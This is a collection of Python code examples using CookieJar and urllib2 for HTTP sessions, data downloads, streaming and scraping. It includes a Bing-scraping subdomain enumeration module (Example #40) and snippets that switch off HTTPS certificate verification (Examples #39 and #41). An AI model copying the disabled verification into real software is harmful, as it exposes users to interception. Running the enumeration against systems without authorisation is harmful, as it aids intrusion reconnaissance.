#        Cookie(version, name, value, port, port_specified,
#                 domain, domain_specified, domain_initial_dot,
#                 path, path_specified, secure, expires,
#                 discard, comment, comment_url, rest,
#                 rfc2109=False):

        cookie = Cookie(0, name, value, port, bool(port),
                        domain or '', bool(domain),
                        (domain and domain.startswith('.')),
                        path or '', bool(path), False, expires,
                        session, None, None, {}, False)
        self._cookie_jar.set_cookie(cookie)

    def delete_cookie(self, name, domain=None, path=None):
        try:
            self._cookie_jar.clear(domain, path, name)
        except KeyError:
            pass

    # Internal methods
    @lazy_property
    def _lxml_parser(self):
        return html_parser_for(self, wsgi_elements)

    def _open(self, url, method='GET', data=None, refer=True,
              content_type=None):
        before_browser_activity.send(self)
        open_started = time()

        if data:
            data = urlencode(data)

        url = urljoin(self._base_url, url)
        if method == 'GET':
            if '?' in url:
                url, query_string = url.split('?', 1)
            else:
                query_string = None

            if data:
                query_string = data
            if query_string:
                url = url + '?' + query_string

            request = urllib2.Request(url)
        elif method == 'POST':
            request = urllib2.Request(url, data)
        else:
            raise Exception('Unsupported method: %s' % method)
        if self._referrer and refer:
            request.add_header('Referer', self._referrer)

        logger.info('%s(%s)', url, method)
        request_started = time()

        response = self._opener.open(request)

        request_ended = time()

        self.status_code = response.getcode()
        self.headers = Headers(
            (head.strip().split(': ',1) for head in response.info().headers)
        )
        self._referrer = request.get_full_url()
        self.location = response.geturl()
        self._response = response
        self.response = ''.join(list(response))
        self._sync_document()

        open_ended = time()
        request_time = request_ended - request_started

        logger.info("Fetched %s in %0.3fsec + %0.3fsec browser overhead",
                    url, request_time,
                    open_ended - open_started - request_time)
        after_browser_activity.send(self)
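A hypothetical interaction with the Network browser above (the base URL and cookie values are placeholders, and the module's own helpers such as DOMMixin and the logger are assumed to be importable):

net = Network(base_url="http://localhost:8000/")
net.set_cookie("session", "abc123", domain="localhost", path="/")
net.open("/dashboard")   # GET; _open() handles POST when given method='POST'
print(net.status_code)
print(net.cookies)       # only cookies the policy's return_ok accepts for the current location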
Example #36
    def __init__(self, url, **kwargs):
        """
        Request init
        """
        self.request = None
        self.response = None
        self.code = -1
        self.header = {}
        self.cookieJar = None
        self.reason = ''
        self.content = ''
        self.content_dict = {}

        # whether to decode the server response from JSON into a dict
        self.is_decode_response = kwargs.get('is_decode_response', False)

        data = kwargs.get('data', None)
        # when the request is a GET and a data dict is also passed, post_type defaults to 'form';
        # the dict is urlencoded and appended to the request URL
        post_type = kwargs.get('post_type', 'form')
        if data is not None:
            if isinstance(data, dict):
                if post_type == 'json':
                    data_str = json.dumps(data)
                else:
                    # data = {"name":"meetbill", "age":"21"}  ==> urlencode(data) = 'age=21&name=meetbill'
                    data_str = urlencode(data)
            else:
                # data passed in as a ready-made string is used as-is
                data_str = data

            if not isinstance(data_str, basestring):
                raise ValueError('data must be string or dict')
        else:
            data_str = None

        request_type = kwargs.get('type', 'POST')
        if data_str and isinstance(
                request_type, basestring) and request_type.upper() != 'POST':
            # for a GET request, fold the data into the URL as the query string
            url = '{}?{}'.format(url, data_str)
            data_str = None  # GET data must be None

        self.request = urlRequest(url, data_str)
        # Content-type defaults to 'application/x-www-form-urlencoded'
        if request_type.upper() == 'POST' and post_type == "json":
            self.request.add_header('Content-type', 'application/json')

        # referer
        referer = kwargs.get('referer', None)
        if referer:
            self.request.add_header('referer', referer)

        # user-agent
        user_agent = kwargs.get('user_agent', None)
        if user_agent:
            self.request.add_header('User-Agent', user_agent)

        # auth
        auth = kwargs.get('auth', None)
        if auth and isinstance(auth, dict) and 'usr' in auth:
            auth_string = base64.b64encode('{}:{}'.format(
                auth.get('usr', ''), auth.get('pwd', '')))
            self.request.add_header('Authorization',
                                    'Basic {}'.format(auth_string))

        # cookie
        cookie = kwargs.get('cookie', None)
        cj = None
        if cookie:
            if isinstance(cookie, CookieJar):
                cj = cookie
            elif isinstance(cookie, dict):
                result = []
                for k, v in cookie.items():
                    result.append('{}={}'.format(k, v))
                cookie = '; '.join(result)
            elif isinstance(cookie, Cookie.BaseCookie):
                cookie = cookie.output(header='')
            if isinstance(cookie, basestring):
                self.request.add_header('Cookie', cookie)

        if cj is None:
            cj = CookieJar()

        #! TODO: proxy

        # build opener
        debuglevel = 1 if kwargs.get('debug', False) else 0
        opener = build_opener(HTTPHandler(debuglevel=debuglevel),
                              HTTPSHandler(debuglevel=debuglevel),
                              HTTPCookieProcessor(cj))

        # timeout
        timeout = kwargs.get('timeout')
        if not isinstance(timeout, int):
            timeout = _DEFAULT_TIMEOUT

        t_beginning = time.time()
        try:
            # opener.open accepts either a URL or a Request object:
            # a plain string is treated as a URL, anything else as a pre-built Request
            self.response = opener.open(self.request, timeout=timeout)
            self.code = self.response.getcode()
            self.header = self.response.info().dict
            self.cookieJar = cj
            self.content = self.response.read()
            # decode the response body into a dict
            if self.is_decode_response:
                self.content_dict = json.loads(self.content)

                # check whether the response content matches the expected value
                check_key = kwargs.get('check_key', None)
                check_value = kwargs.get('check_value', None)
                if check_key is not None and check_value is not None:
                    # check the type of check_value
                    if isinstance(check_value, list):
                        if self.content_dict[check_key] not in check_value:
                            self.code = -1
                            self.reason = "[response not match: {response_value} not in {check_value}]".format(
                                response_value=self.content_dict[check_key],
                                check_value=check_value)
                    elif self.content_dict[check_key] != check_value:
                        self.code = -1
                        self.reason = "[response not match: {response_value} != {check_value}]".format(
                            response_value=self.content_dict[check_key],
                            check_value=check_value)
        except HTTPError as e:
            self.code = e.code
            self.reason = '{}'.format(e)
        except URLError as e:
            self.code = -1
            self.reason = e.reason
        except Exception as e:
            self.code = -1
            self.reason = '{}'.format(e)

        seconds_passed = time.time() - t_beginning
        cost_str = "%.6f" % seconds_passed

        # write the request log
        f = inspect.currentframe().f_back
        file_name, lineno, func_name = self._get_backframe_info(f)

        log_msg = ("[file={file_name}:{func_name}:{lineno} "
                   "type=http_{method} "
                   "req_path={req_path} "
                   "req_data={req_data} "
                   "cost={cost} "
                   "is_success={is_success} "
                   "err_no={err_no} "
                   "err_msg={err_msg} "
                   "res_len={res_len} "
                   "res_data={res_data} "
                   "res_attr={res_attr}]".format(file_name=file_name,
                                                 func_name=func_name,
                                                 lineno=lineno,
                                                 method=request_type,
                                                 req_path=url,
                                                 req_data=data,
                                                 cost=cost_str,
                                                 is_success=self.success(),
                                                 err_no=self.code,
                                                 err_msg=self.reason,
                                                 res_len=len(self.content),
                                                 res_data=self.content,
                                                 res_attr=json.dumps(
                                                     self.header)))

        if self.success():
            log.info(log_msg)
        else:
            log.error(log_msg)
Example #37
    def __init__(self):
        """ Initialisation de AdeConnectionUtil
		Cette méthode permet de construire le connecteur de site et le
		gestionnaire de cookie."""
        self.CJ = CookieJar()
        self.connection = build_opener(HTTPCookieProcessor(self.CJ))
Example #38
def DownloadRoutine(tile, year, momonth, outputfolder):
    """Downloads files"""
    username = '******'
    password = '******'
    scratch = tempfile.mkdtemp()
    f = date(int(year), int(momonth), 1)
    DOY = str(f.timetuple().tm_yday).rjust(3, '0')
    hdf_pattern = re.compile(
        'MOD13A3.A' + year + DOY + '.' + tile + '.006.*.hdf$', re.IGNORECASE)
    source = "http://e4ftl01.cr.usgs.gov/" + "MOLT/MOD13A3.006/" + year + "." + momonth + ".01/"
    webFile = os.path.join(scratch, "earthdata.html")

    matched_file = ''
    files = []
    match_array = []
    try:
        if ALFlib.getDownload(source, webFile):
            page = open(webFile).read()
            files = []
            for url in page.split('<a href="'):
                link = url.split('">', 1)[0]
                if link.endswith('hdf'):
                    files.append(link.split("/")[-1])
    except urllib2.HTTPError:
        arcpy.AddMessage("\n[ERROR] No data for that date\n")
        sys.exit()
    for f in files:
        if re.match(hdf_pattern, f):
            matched_file = f
            match_array.append(matched_file)
            break
    if matched_file == '':
        print("\n[ERROR] No data for that tile\n")

    print("Found: " + matched_file)

    username = '******'
    password = '******'
    for f in match_array:
        url = os.path.join(source, f)
        print(url)
        file_name = url.split('/')[-1]

        # The user credentials that will be used to authenticate access to the data
        # Create a password manager to deal with the 401 response that is returned from
        # Earthdata Login

        password_manager = urllib2.HTTPPasswordMgrWithDefaultRealm()
        password_manager.add_password(None, "https://urs.earthdata.nasa.gov",
                                      username, password)

        # Create a cookie jar for storing cookies. This is used to store and return
        # the session cookie given to use by the data server (otherwise it will just
        # keep sending us back to Earthdata Login to authenticate).  Ideally, we
        # should use a file based cookie jar to preserve cookies between runs. This
        # will make it much more efficient.

        cookie_jar = CookieJar()

        # Install all the handlers.

        opener = urllib2.build_opener(
            urllib2.HTTPBasicAuthHandler(password_manager),
            # urllib2.HTTPHandler(debuglevel=1),    # Uncomment these two lines to see
            # urllib2.HTTPSHandler(debuglevel=1),   # details of the requests/responses
            urllib2.HTTPCookieProcessor(cookie_jar))
        urllib2.install_opener(opener)

        # Create and submit the request. There are a wide range of exceptions that
        # can be thrown here, including HTTPError and URLError. These should be
        # caught and handled.

        request = urllib2.Request(url)
        response = urllib2.urlopen(request)

        # Print out the result (not a good idea with binary data!)

        body = response.read()
        file_ = open(os.path.join(outputfolder, file_name), 'wb')
        file_.write(body)
        file_.close()

        logging.debug("%s : Your file, %s has downloaded to %s",
                      datelog, file_name,
                      os.path.join(outputfolder, file_name))
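The comments above suggest a file-based cookie jar so the Earthdata session cookie survives between runs. A minimal sketch of that idea using the standard library's LWPCookieJar (the cookie file path is a placeholder, and the opener would still need the password-manager handler shown in the example):

import os
import urllib2
from cookielib import LWPCookieJar

COOKIE_PATH = os.path.expanduser("~/.earthdata_cookies.txt")  # placeholder location

cookie_jar = LWPCookieJar(COOKIE_PATH)
if os.path.exists(COOKIE_PATH):
    # Reuse the session cookie from a previous run instead of re-authenticating.
    cookie_jar.load(ignore_discard=True, ignore_expires=True)

opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cookie_jar))
urllib2.install_opener(opener)

# ... perform the authenticated requests as in the example above ...

# Persist whatever the server handed back for the next invocation.
cookie_jar.save(ignore_discard=True, ignore_expires=True)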
Example #39
        print('send result:', data)
    #print('===send===data', data)


def main(server=False):
    global IS_SERVER
    global MemberList, MemberMap, MemberNickMap
    if server:
        IS_SERVER = True
    try:
        ssl._create_default_https_context = ssl._create_unverified_context
    except Exception, e:
        print('ssl module loading problem', str(e))

    opener = wxb_urllib.build_opener(
        wxb_urllib.HTTPCookieProcessor(CookieJar()))
    opener.addheaders = [(
        'User-agent',
        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36'
    )]
    wxb_urllib.install_opener(opener)

    if not getUUID():
        print('failed to get uuid')
        return

    print('fetching the QR code image...')
    showQRImage()
    time.sleep(1)

    while waitForLogin() != '200':
Example #40
 def module_run(self, domains):
     base_url = 'https://www.bing.com/search'
     for domain in domains:
         self.heading(domain, level=0)
         base_query = 'domain:' + domain
         pattern = '"b_algo"><h2><a href="(?:\w*://)*(\S+?)\.%s[^"]*"' % (
             domain)
         subs = []
         # control variables
         new = True
         page = 0
         nr = 50
         cookiejar = CookieJar()
         cookiejar.set_cookie(
             self.make_cookie('SRCHHPGUSR',
                              'NEWWND=0&NRSLT=%d&SRCHLANG=&AS=1' % (nr),
                              '.bing.com'))
         # execute search engine queries and scrape results storing subdomains in a list
         # loop until no new subdomains are found
         while new == True:
             content = None
             query = ''
             # build query based on results of previous results
             for sub in subs:
                 query += ' -domain:%s.%s' % (sub, domain)
             full_query = base_query + query
             url = '%s?first=%d&q=%s' % (base_url, (page * nr),
                                         urllib.quote_plus(full_query))
             # bing errors out at > 2059 characters not including the protocol
             if len(url) > 2066: url = url[:2066]
             self.verbose('URL: %s' % (url))
             # send query to search engine
             resp = self.request(url, cookiejar=cookiejar)
             if resp.status_code != 200:
                 self.alert(
                     'Bing has encountered an error. Please submit an issue for debugging.'
                 )
                 break
             content = resp.text
             sites = re.findall(pattern, content)
             # create a unique list
             sites = list(set(sites))
             new = False
             # add subdomain to list if not already exists
             for site in sites:
                 if site not in subs:
                     subs.append(site)
                     new = True
                     host = '%s.%s' % (site, domain)
                     self.output('%s' % (host))
                     self.add_hosts(host)
             if not new:
                 # exit if all subdomains have been found
                 if not '>Next</a>' in content:
                     break
                 else:
                     page += 1
                     self.verbose(
                         'No New Subdomains Found on the Current Page. Jumping to Result %d.'
                         % ((page * nr) + 1))
                     new = True
             # sleep script to avoid lock-out
             self.verbose('Sleeping to avoid lockout...')
             time.sleep(random.randint(5, 15))
Example #41
def esa_cryosat_sync(PRODUCT,
                     YEARS,
                     BASELINE=None,
                     DIRECTORY=None,
                     BBOX=None,
                     POLYGON=None,
                     LOG=False,
                     LIST=False,
                     MODE=None,
                     CLOBBER=False):

    #-- create log file with list of synchronized files (or print to terminal)
    if LOG:
        #-- check if log directory exists and recursively create if not
        os.makedirs(DIRECTORY, MODE) if not os.path.exists(DIRECTORY) else None
        #-- format: ESA_CS_SIR_SIN_L2_sync_2002-04-01.log
        today = time.strftime('%Y-%m-%d', time.localtime())
        LOGFILE = 'ESA_CS_{0}_sync_{1}.log'.format(PRODUCT, today)
        fid1 = open(os.path.join(DIRECTORY, LOGFILE), 'w')
        print('ESA CryoSat-2 Sync Log ({0})'.format(today), file=fid1)
        print('PRODUCT={0}'.format(PRODUCT), file=fid1)
    else:
        #-- standard output (terminal output)
        fid1 = sys.stdout

    #-- CryoSat-2 Science Server url [sic Cry0Sat2_data]
    #-- static site is no longer available
    HOST = posixpath.join('https://science-pds.cryosat.esa.int')
    #-- compile xml parsers for lxml
    XMLparser = lxml.etree.XMLParser()
    #-- Create cookie jar for storing cookies
    cookie_jar = CookieJar()
    #-- create "opener" (OpenerDirector instance)
    opener = urllib2.build_opener(
        urllib2.HTTPSHandler(context=ssl.SSLContext()),
        urllib2.HTTPCookieProcessor(cookie_jar))
    #-- Now all calls to urllib2.urlopen use our opener.
    urllib2.install_opener(opener)
    #-- All calls to urllib2.urlopen will now use handler
    #-- Make sure not to include the protocol in with the URL, or
    #-- HTTPPasswordMgrWithDefaultRealm will be confused.

    #-- compile regular expression operator for years to sync
    regex_years = '|'.join('{0:d}'.format(y) for y in YEARS)
    R1 = re.compile('({0})'.format(regex_years), re.VERBOSE)
    #-- regular expression pattern for months of the year
    regex_months = '|'.join('{0:02d}'.format(m) for m in range(1, 13))
    R2 = re.compile('({0})'.format(regex_months), re.VERBOSE)

    #-- compile the regular expression operator to find CryoSat-2 files
    #-- spatially subset data using bounding box or polygon file
    if BBOX:
        #-- if using a bounding box to spatially subset data
        #-- only find header files to extract latitude and longitude coordinates
        R3 = compile_regex_pattern(PRODUCT, BASELINE, SUFFIX='(HDR)')
        #-- min_lon,min_lat,max_lon,max_lat
        lon = [BBOX[0], BBOX[2], BBOX[2], BBOX[0], BBOX[0]]
        lat = [BBOX[1], BBOX[1], BBOX[3], BBOX[3], BBOX[1]]
        #-- create shapely polygon
        poly_obj = shapely.geometry.Polygon(list(zip(lon, lat)))
        #-- Valid Polygon cannot have overlapping exterior or interior rings
        if (not poly_obj.is_valid):
            poly_obj = poly_obj.buffer(0)
    elif POLYGON:
        #-- if using a polygon file to spatially subset data
        #-- only find header files to extract latitude and longitude coordinates
        R3 = compile_regex_pattern(PRODUCT, BASELINE, SUFFIX='(HDR)')
        #-- read shapefile, kml/kmz file or GeoJSON file
        fileBasename, fileExtension = os.path.splitext(POLYGON)
        #-- extract file name and subsetter indices lists
        match_object = re.match('(.*?)(\[(.*?)\])?$', POLYGON)
        FILE = os.path.expanduser(match_object.group(1))
        #-- read specific variables of interest
        v = match_object.group(3).split(',') if match_object.group(2) else None
        #-- get MultiPolygon object from input spatial file
        if fileExtension in ('.shp', '.zip'):
            #-- if reading a shapefile or a zipped directory with a shapefile
            ZIP = (fileExtension == '.zip')
            m = read_shapefile(os.path.expanduser(FILE), VARIABLES=v, ZIP=ZIP)
        elif fileExtension in ('.kml', '.kmz'):
            #-- if reading a keyhole markup language (can be compressed)
            KMZ = (fileExtension == '.kmz')
            m = read_kml_file(os.path.expanduser(FILE), VARIABLES=v, KMZ=KMZ)
        elif fileExtension in ('.json', '.geojson'):
            #-- if reading a GeoJSON file
            m = read_geojson_file(os.path.expanduser(FILE), VARIABLES=v)
        else:
            raise IOError('Unlisted polygon type ({0})'.format(fileExtension))
        #-- calculate the convex hull of the MultiPolygon object for subsetting
        poly_obj = m.convex_hull
        #-- Valid Polygon cannot have overlapping exterior or interior rings
        if (not poly_obj.is_valid):
            poly_obj = poly_obj.buffer(0)
    else:
        R3 = compile_regex_pattern(PRODUCT, BASELINE)

    #-- open connection with Cryosat-2 science server at remote directory
    parameters = {'file': posixpath.join('Cry0Sat2_data', PRODUCT)}
    url = posixpath.join(HOST, '?do=list&{0}'.format(urlencode(parameters)))
    request = urllib2.Request(url=url)
    response = urllib2.urlopen(request, timeout=60)
    table = json.loads(response.read().decode())
    #-- find remote yearly directories for PRODUCT within YEARS
    YRS = [t['name'] for t in table['results'] if R1.match(t['name'])]
    for Y in YRS:
        #-- open connection with Cryosat-2 science server at remote directory
        parameters = {'file': posixpath.join('Cry0Sat2_data', PRODUCT, Y)}
        url = posixpath.join(HOST,
                             '?do=list&{0}'.format(urlencode(parameters)))
        request = urllib2.Request(url=url)
        response = urllib2.urlopen(request, timeout=360)
        table = json.loads(response.read().decode())
        #-- find remote monthly directories for PRODUCT within year
        MNS = [t['name'] for t in table['results'] if R2.match(t['name'])]
        for M in MNS:
            #-- local directory for data product of year and month
            local_dir = os.path.join(DIRECTORY, PRODUCT, Y, M)
            #-- check if local directory exists and recursively create if not
            os.makedirs(local_dir,
                        MODE) if not os.path.exists(local_dir) else None
            #-- open connection with Cryosat-2 science server at remote directory
            parameters = {
                'file': posixpath.join('Cry0Sat2_data', PRODUCT, Y, M)
            }
            url = posixpath.join(HOST,
                                 '?do=list&{0}'.format(urlencode(parameters)))
            request = urllib2.Request(url=url)
            response = urllib2.urlopen(request, timeout=360)
            table = json.loads(response.read().decode())
            #-- find remote files for PRODUCT within year and month
            colnames = [t['name'] for t in table['results']]
            collastmod = [t['mtime'] for t in table['results']]
            #-- if spatially subsetting
            if BBOX or POLYGON:
                #-- find names of valid header files
                header_files = [
                    f for i, f in enumerate(colnames) if R3.match(f)
                ]
                for f in sorted(header_files):
                    #-- remote and local versions of the file
                    parameters = {
                        'file': posixpath.join('Cry0Sat2_data', PRODUCT, Y, M,
                                               f)
                    }
                    remote_file = posixpath.join(
                        HOST, '?do=download&{0}'.format(urlencode(parameters)))
                    #-- extract information from filename
                    MI, CLASS, PRD, START, STOP, BSLN, VERS, SFX = R3.findall(
                        f).pop()
                    #-- read XML header file and check if intersecting
                    if parse_xml_file(remote_file, poly_obj, XMLparser):
                        #-- compile regular expression operator for times
                        R4 = compile_regex_pattern(PRODUCT,
                                                   BASELINE,
                                                   START=START,
                                                   STOP=STOP)
                        subset = [
                            i for i, f in enumerate(colnames) if R4.match(f)
                        ]
                        for i in subset:
                            #-- remote and local versions of the file
                            parameters = {
                                'file':
                                posixpath.join('Cry0Sat2_data', PRODUCT, Y, M,
                                               colnames[i])
                            }
                            remote_file = posixpath.join(
                                HOST, '?do=download&{0}'.format(
                                    urlencode(parameters)))
                            local_file = os.path.join(local_dir, colnames[i])
                            #-- get last modified date in unix time
                            remote_mtime = collastmod[i]
                            http_pull_file(fid1, remote_file, remote_mtime,
                                           local_file, LIST, CLOBBER, MODE)
            else:
                #-- find lines of valid files
                valid_lines = [
                    i for i, f in enumerate(colnames) if R3.match(f)
                ]
                for i in valid_lines:
                    #-- remote and local versions of the file
                    parameters = {
                        'file':
                        posixpath.join('Cry0Sat2_data', PRODUCT, Y, M,
                                       colnames[i])
                    }
                    remote_file = posixpath.join(
                        HOST, '?do=download&{0}'.format(urlencode(parameters)))
                    local_file = os.path.join(local_dir, colnames[i])
                    #-- get last modified date in unix time
                    remote_mtime = collastmod[i]
                    #-- check that file is not in file system unless overwriting
                    http_pull_file(fid1, remote_file, remote_mtime, local_file,
                                   LIST, CLOBBER, MODE)

    #-- close log file and set permissions level to MODE
    if LOG:
        fid1.close()
        os.chmod(os.path.join(DIRECTORY, LOGFILE), MODE)
Example #42
0
 def init(self):
     self._client = urllib2.build_opener(
         urllib2.HTTPCookieProcessor(CookieJar()))
     self.url = self.resolve_file_url(self._resolver_class, self._url)
     if not self.url:
         raise HTTPLoader.Error('Url was not resolved to file link')
Example #43
0
 def new_opener(self):
     from cookielib import CookieJar
     from urllib2 import build_opener, HTTPCookieProcessor
     return build_opener(HTTPCookieProcessor(CookieJar()))
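The one-liner in Example #43 is the minimal cookie-aware opener. As a hedged sketch (the URLs below are placeholders), cookies captured from one response through such an opener are replayed automatically on every later request made through the same opener:

from cookielib import CookieJar
from urllib2 import build_opener, HTTPCookieProcessor

jar = CookieJar()
opener = build_opener(HTTPCookieProcessor(jar))

# the first response's Set-Cookie headers are captured in `jar`
opener.open('http://example.com/login')
# later requests made through the same opener send those cookies back automatically
opener.open('http://example.com/profile')
for cookie in jar:
    print cookie.name, cookie.value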
Example #44
0
class HLSFetcher(object):

	def __init__(self, url, **options):

		self.program = options.get('program',1)
		self.hls_headers = options.get('headers',{})
		self.path = options.get('path',None)
		self.bitrate = options.get('bitrate',200000)
		self.nbuffer = options.get('buffer',5)
		self.n_segments_keep = options.get('keep',self.nbuffer+1)
		url = urllib.unquote(url)
		self.puser = options.get('puser')
		self.ppass = options.get('ppass')
		self.purl = options.get('purl')

		us = url.split('|')
		if len(us) > 1:
			self.url = us[0]
			for hd in us[1:]:
				self.hls_headers.update(dict(urlparse.parse_qsl(hd.strip())))
		else:
			self.url = url

		self.agent = self.hls_headers.pop('User-Agent', getUserAgent())
		if not self.path:
			self.path = tempfile.mkdtemp()

		self._program_playlist = None
		self._file_playlist = None
		self._cookies = CookieJar()
		self._cached_files = {} 	# sequence n -> path
		self._run = True
		self._poolHelper = TwHTTP11PoolHelper(retryAutomatically=True)

		self._files = None 			# the iter of the playlist files download
		self._next_download = None 	# the delayed download defer, if any
		self._file_playlisted = None # the defer to wait until new files are added to playlist
		self._new_filed = None
		self._seg_task = None

	def _get_page(self, url):
		url = url.encode("utf-8")
		if 'HLS_RESET_COOKIES' in os.environ.keys():
			self._cookies.clear()

		timeout = 10
		return twAgentGetPage(url, agent=self.agent, cookieJar=self._cookies, headers=self.hls_headers, timeout=timeout, pool=self._poolHelper._pool, proxy_url=self.purl, p_user=self.puser, p_pass=self.ppass)

	def _download_page(self, url, path, file):
		def _decrypt(data):
			def num_to_iv(n):
				iv = struct.pack(">8xq", n)
				return b"\x00" * (16 - len(iv)) + iv

			if not self._file_playlist._iv:
				iv = num_to_iv(file['sequence'])
				aes = AES.new(self._file_playlist._key, AES.MODE_CBC, iv)
			else:
				aes = AES.new(self._file_playlist._key, AES.MODE_CBC, self._file_playlist._iv)
			return aes.decrypt(data)

		d = self._get_page(url)
		if self._file_playlist._key:
			d.addCallback(_decrypt)
		return d

	def _download_segment(self, f):
		url = make_url(self._file_playlist.url, f['file'])
		name = 'seg_' + next(tempfile._get_candidate_names())
		path = os.path.join(self.path, name)
		d = self._download_page(url, path, f)
		if self.n_segments_keep != 0:
			file = open(path, 'wb')
			d.addCallback(lambda x: file.write(x))
			d.addBoth(lambda _: file.close())
			d.addCallback(lambda _: path)
			d.addErrback(self._got_file_failed)
			d.addCallback(self._got_file, url, f)
		else:
			d.addCallback(lambda _: (None, path, f))
		return d

	def delete_cache(self, f):
		bgFileEraser = eBackgroundFileEraser.getInstance()
		keys = self._cached_files.keys()
		for i in ifilter(f, keys):
			filename = self._cached_files[i]
			bgFileEraser.erase(str(filename))
			del self._cached_files[i]

	def delete_all_cache(self):
		bgFileEraser = eBackgroundFileEraser.getInstance()
		for path in self._cached_files.itervalues():
			bgFileEraser.erase(str(path))
		self._cached_files.clear()

	def _got_file_failed(self, e):
		if self._new_filed:
			self._new_filed.errback(e)
			self._new_filed = None

	def _got_file(self, path, url, f):
		self._cached_files[f['sequence']] = path
		if self.n_segments_keep != -1:
			self.delete_cache(lambda x: x <= f['sequence'] - self.n_segments_keep)
		if self._new_filed:
			self._new_filed.callback((path, url, f))
			self._new_filed = None
		return (path, url, f)

	def _get_next_file(self):
		next = self._files.next()
		if next:
			return self._download_segment(next)
		elif not self._file_playlist.endlist():
			self._seg_task.stop()
			self._file_playlisted = defer.Deferred()
			self._file_playlisted.addCallback(lambda x: self._get_next_file())
			self._file_playlisted.addCallback(self._next_file_delay)
			self._file_playlisted.addCallback(self._seg_task.start)
			return self._file_playlisted

	def _handle_end(self, failure):
		failure.trap(StopIteration)
		print "End of media"

	def _next_file_delay(self, f):
		if f == None: return 0
		delay = f[2]["duration"]
		if self.nbuffer > 0:
			for i in range(0,self.nbuffer):
				if self._cached_files.has_key(f[2]['sequence'] - i):
					return delay
			delay = 0
		elif self._file_playlist.endlist():
			delay = 1
		return delay

	def _get_files_loop(self, res=None):
		if not self._seg_task:
			self._seg_task = task.LoopingCall(self._get_next_file)
		d = self._get_next_file()
		if d != None:
			self._seg_task.stop()
			d.addCallback(self._next_file_delay)
			d.addCallback(self._seg_task.start)
			d.addErrback(self._handle_end)

	def _playlist_updated(self, pl):
		if pl and pl.has_programs():
			# if we got a program playlist, save it and start a program
			self._program_playlist = pl
			(program_url, _) = pl.get_program_playlist(self.program, self.bitrate)
			return self._reload_playlist(M3U8(program_url, self._cookies, self.hls_headers))
		elif pl and pl.has_files():
			# we got sequence playlist, start reloading it regularly, and get files
			self._file_playlist = pl
			if not self._files:
				self._files = pl.iter_files()
			if not pl.endlist():
				reactor.callLater(pl.reload_delay(), self._reload_playlist, pl)
			if self._file_playlisted:
				self._file_playlisted.callback(pl)
				self._file_playlisted = None
		else:
			raise Exception('Playlist has no valid content.')
		return pl

	def _got_playlist_content(self, content, pl):
		if not pl.update(content) and self._run:
			# if the playlist cannot be loaded, start a reload timer
			d = deferLater(reactor, pl.reload_delay(), self._fetch_playlist, pl)
			d.addCallback(self._got_playlist_content, pl)
			return d
		return pl

	def _fetch_playlist(self, pl):
		d = self._get_page(pl.url)
		return d

	def _reload_playlist(self, pl):
		if self._run:
			d = self._fetch_playlist(pl)
			d.addCallback(self._got_playlist_content, pl)
			d.addCallback(self._playlist_updated)
			return d
		else:
			return None

	def get_file(self, sequence):
		d = defer.Deferred()
		keys = self._cached_files.keys()
		try:
			endlist = sequence == self._file_playlist._end_sequence
			sequence = ifilter(lambda x: x >= sequence, keys).next()
			filename = self._cached_files[sequence]
			d.callback((filename, endlist))
		except:
			d.addCallback(lambda x: self.get_file(sequence))
			self._new_filed = d
			keys.sort()
		return d

	def _start_get_files(self, x):
		self._new_filed = defer.Deferred()
		self._get_files_loop()
		return self._new_filed

	def start(self):
		if self._run:
			self._files = None
			d = self._reload_playlist(M3U8(self.url, self._cookies, self.hls_headers))
			d.addCallback(self._start_get_files)
			return d

	def stop(self):
		self._run = False
		self._poolHelper.close()
		if self._seg_task != None:
			self._seg_task.stop()
		if self._new_filed != None:
			self._new_filed.cancel()
		reactor.callLater(1, self.delete_all_cache)
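The `_decrypt` helper in `_download_page` above follows the usual HLS convention for AES-128 segments: when the key tag carries no explicit IV, the IV is the segment's media sequence number encoded as a 16-byte big-endian integer. A standalone sketch of that derivation (assuming a PyCrypto-compatible `AES` module; `key`, `data` and `sequence` stand in for the playlist key, the downloaded segment and its sequence number):

import struct
from Crypto.Cipher import AES

def sequence_to_iv(sequence):
    # ">8xq" packs 8 zero padding bytes followed by a big-endian signed 64-bit
    # integer, producing the 16-byte IV used when the playlist specifies none
    return struct.pack(">8xq", sequence)

def decrypt_segment(data, key, sequence, explicit_iv=None):
    iv = explicit_iv if explicit_iv else sequence_to_iv(sequence)
    return AES.new(key, AES.MODE_CBC, iv).decrypt(data)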
Example #45
0
def scrapeContent(url, agency):

    config = {
        'cnn': {
            'attr_key': '_class',
            'attr_val': 'zn-body__paragraph',
            'cookie': False,
            'tag': 'p',
            'parent': {
                'attr_key': 'itemprop',
                'attr_val': 'articleBody',
            }
        },
        'foxnews': {
            'attr_key': '_class',
            'attr_val': '',
            'cookie': False,
            'tag': 'p',
            'parent': {
                'attr_key': 'itemprop',
                'attr_val': 'articleBody',
            }
        },
        'nytimes': {
            'attr_key': '_class',
            'attr_val': 'story-body-text story-content',
            'cookie': True
        },
        'gma': {
            'attr_key': 'itemprop',
            'attr_val': 'articleBody',
            'cookie': False
        },
        'usatoday': {
            'attr_key': '_class',
            'attr_val': '',
            'cookie': False,
            'tag': 'p',
            'parent': {
                'attr_key': 'itemprop',
                'attr_val': 'articleBody',
            }
        },
        'latimes': {
            'attr_key': '_class',
            'attr_val': '',
            'cookie': False,
            'tag': 'p',
            'parent': {
                'attr_key': 'itemprop',
                'attr_val': 'articleBody',
            }
        },
        'washtimes': {
            'attr_key': '_class',
            'attr_val': '',
            'cookie': False,
            'tag': 'p',
            'parent': {
                'attr_key': '_class',
                'attr_val': 'storyareawrapper',
            }
        },
        'usnews': {
            'attr_key': '_class',
            'attr_val': 'MsoNormal',
            'cookie': False,
            'tag': 'p',
            # 'parent': {
            #     'attr_key': '_class',
            #     'attr_val': 'block skin-editable',
            # }
        },
    }

    cj = CookieJar()
    opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))

    # page = requests.get(url)
    # print page.content
    # exit()

    hdr = {
        'User-Agent':
        'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11',
        'Accept':
        'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
        'Accept-Charset': 'ISO-8859-1,utf-8;q=0.7,*;q=0.3',
        'Accept-Encoding': 'none',
        'Accept-Language': 'en-US,en;q=0.8',
        'Connection': 'keep-alive'
    }

    req = urllib2.Request(url, headers=hdr)

